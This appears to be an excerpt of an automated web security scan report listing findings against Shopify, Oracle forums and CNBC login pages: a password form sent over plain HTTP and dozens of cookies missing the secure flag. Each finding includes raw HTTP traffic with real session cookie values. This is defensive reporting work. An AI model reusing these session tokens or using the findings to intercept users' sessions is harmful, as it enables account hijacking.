Confidence:
Certain
Host:
http://www.shopify.com
Path:
/login
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://www.shopify.com/login The form contains the following password field:
Request
GET /login HTTP/1.1 Host: www.shopify.com Proxy-Connection: keep-alive Referer: http://www.shopify.com/examples User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _y=76726C16-B1FA-490A-93B3; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641; optimizelyBuckets=%7B%7D; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.8.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; olarkld=1315341237560; _oklv=1315341242826; _s=08DB14DB-F588-4766-8659; __ar_v4=EBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A3%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A3%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1%7CRFYZ2NEPUVBUFENBCOH6GL%3A20110906%3A2
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Status: 200 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11 ETag: "5e6cd1cceddc58f0b1054bb20da87a2e" X-Rack-Cache: fresh X-Content-Digest: 3f0391ebb89e0d08d8add07de6cf12a5cb1d4dee X-Runtime: 1746 Cache-Control: public, max-age=300 Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack) P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 15228 Date: Tue, 06 Sep 2011 15:40:58 GMT X-Varnish: 1482397443 1482397441 Age: 108 Via: 1.1 varnish Connection: keep-alive X-Cache: HIT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea...[SNIP]... <div class="col-5" style="padding-top:25px;"> <form method="post"> <label for="subdomain">...[SNIP]... </label><input class="formnote" id="password" type="password" name="password" value="" /> <!-- <span class="formnote">...[SNIP]...
7. SSL cookie without secure flag set
previous
next
There are 68 instances of this issue:
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
7.1. https://forums.oracle.com/forums/adfAuthentication
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/adfAuthentication
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/adfAuthentication?success_url=/main.jspa?categoryID=84 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; BIGipServerforums_prod_pool=51417741.20480.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84
Response
HTTP/1.1 302 Moved Temporarily Server: Oracle-Application-Server-10g Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~5D09C635ADF7FCDB0B22A013B7D8A7E733E380B6F6B6FECC2930922D66B8A284C6CAC96F2D43EDA75D75999112956B40FF55201353C5FF03211190E58DE009348F6D3456BA825C6590982D6D5B75724AC9C814653CA5B4274DF09863BB77CA0770B13679F52272A0D1E2FE7CA3525FF488B1976FEF2DF74B823F474CB693675BC66F11D8776FC908E5FFD08D5EEEC4F5C523677FFE230719283092BCC55C29D4C61D4D7016E82800B744931F8E3DF98D4ED662639D486F749A20DED6E2B1D87CCF2068965103F4675905FB43A8DED28469B093EC4D09E6686DE6852A4B2608F1844974BE4B33DFF805A1E7EEB276CEA7 Osso-Paranoid: false Content-Type: text/html Content-Length: 0 Date: Tue, 06 Sep 2011 16:14:09 GMT Connection: keep-alive Vary: Accept-EncodingSet-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums
7.2. https://forums.oracle.com/forums/category.jspa
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/category.jspa
Issue detail
The following cookies were issued by the application and do not have the secure flag set:JSESSIONID=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums BIGipServerforums_prod_pool=202412685.20480.0000; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/category.jspa?categoryID=18 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Content-Language: en-US Content-Type: text/html; charset=UTF-8 Content-Length: 123998 Date: Tue, 06 Sep 2011 16:13:12 GMT Connection: keep-alive Vary: Accept-EncodingSet-Cookie: JSESSIONID=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums Set-Cookie: BIGipServerforums_prod_pool=202412685.20480.0000; path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>OTN Discussion Forums : Database</title> <meta http-equiv="content-type" content="te...[SNIP]...
7.3. https://forums.oracle.com/forums/guestsettings!default.jspa
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/guestsettings!default.jspa
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=8d92100c30d7caf68638f82744638e708dcb2aab2d2d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/guestsettings!default.jspa HTTP/1.1 Host: forums.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Content-Language: en Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 17:07:32 GMT Connection: close Connection: Transfer-EncodingSet-Cookie: JSESSIONID=8d92100c30d7caf68638f82744638e708dcb2aab2d2d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums Content-Length: 36286 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>OTN Discussion Forums : Forum Settings</title> <meta http-equiv="content-type" conte...[SNIP]...
7.4. https://forums.oracle.com/forums/index.jspa
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/index.jspa
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/index.jspa?cat=1 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 302 Moved Temporarily Server: Oracle-Application-Server-10g Content-Language: en-US Location: https://forums.oracle.com/forums/main.jspa?categoryID=84 Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 16:13:25 GMT Connection: keep-alive Vary: Accept-Encoding Connection: Transfer-EncodingSet-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums Content-Length: 246 <HTML><HEAD><TITLE>Redirect to http://forums.oracle.com/forums/main.jspa?categoryID=84</TITLE></HEAD><BODY><A HREF="http://forums.oracle.com/forums/main.jspa?categoryID=84">http://forums.oracle.com/fo...[SNIP]...
7.5. https://forums.oracle.com/forums/login!withRedirect.jspa
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/login!withRedirect.jspa
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/login!withRedirect.jspa HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; BIGipServerforums_prod_pool=51417741.20480.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84
Response
HTTP/1.1 302 Moved Temporarily Server: Oracle-Application-Server-10g Content-Language: en-US Location: https://forums.oracle.com/forums/adfAuthentication?success_url=/main.jspa?categoryID=84 Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 16:14:08 GMT Connection: keep-alive Vary: Accept-Encoding Connection: Transfer-EncodingSet-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums Content-Length: 339 <HTML><HEAD><TITLE>Redirect to http://forums.oracle.com/forums/adfAuthentication?success_url=/main.jspa?categoryID=84</TITLE></HEAD><BODY><A HREF="http://forums.oracle.com/forums/adfAuthentication?suc...[SNIP]...
7.6. https://forums.oracle.com/forums/main.jspa
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/main.jspa
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343589432; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=51417741.20480.0000
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Content-Language: en-US Content-Type: text/html; charset=UTF-8 Content-Length: 246459 Date: Tue, 06 Sep 2011 16:13:42 GMT Connection: keep-alive Vary: Accept-EncodingSet-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>OTN Discussion Forums : Forum Home</title> <meta http-equiv="content-type" content="...[SNIP]...
7.7. https://register.cnbc.com/forgotPassword.do
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://register.cnbc.com
Path:
/forgotPassword.do
Issue detail
The following cookies were issued by the application and do not have the secure flag set:JSESSIONID=3903DB621D7BD6523413306545DD8633; Path=/ pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forgotPassword.do HTTP/1.1 Host: register.cnbc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:49 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19Set-Cookie: JSESSIONID=3903DB621D7BD6523413306545DD8633; Path=/ Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html;charset=UTF-8Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ Content-Length: 85618 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>Reset Password</title> <link href="/css/member_center_sytles.css" rel="stylesheet" typ...[SNIP]...
7.8. https://register.cnbc.com/memberCenter.do
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://register.cnbc.com
Path:
/memberCenter.do
Issue detail
The following cookies were issued by the application and do not have the secure flag set:JSESSIONID=EB56D589D26668AFFB39D13706936E94; Path=/ pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:29 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /memberCenter.do HTTP/1.1 Host: register.cnbc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:01:29 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19Set-Cookie: JSESSIONID=EB56D589D26668AFFB39D13706936E94; Path=/ Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register Content-Length: 0 Connection: close Content-Type: text/plainSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:29 GMT; path=/
7.9. https://register.cnbc.com/registerUser.do
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://register.cnbc.com
Path:
/registerUser.do
Issue detail
The following cookies were issued by the application and do not have the secure flag set:JSESSIONID=0B252CD2AC1891E8F5AE500FFDA5AC28; Path=/ pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /registerUser.do?iframe=yes&source=register HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=EB56D589D26668AFFB39D13706936E94
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:43 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19Set-Cookie: JSESSIONID=0B252CD2AC1891E8F5AE500FFDA5AC28; Path=/ Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html;charset=UTF-8Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/ Content-Length: 53350 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Ty...[SNIP]...
7.10. https://login.cnbc.com/cas/logout
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/logout
Issue detail
The following cookie was issued by the application and does not have the secure flag set:CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cas/logout HTTP/1.1 Host: login.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:04:31 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19Set-Cookie: CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/ Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: SUBSCRIBERINFO=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: SUBSCRIBERINFO2=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: SUBSCRIBERINFO3=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_ws=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: snas=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_ipb_member_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_ipb_session_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_ipb_pass_hash=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_sna=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_enc=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Location: http://www.cnbc.com Content-Language: en Content-Length: 0 Connection: close Content-Type: text/html;charset=ISO-8859-1
7.11. https://login.oracle.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/favicon.ico
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: login.oracle.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2f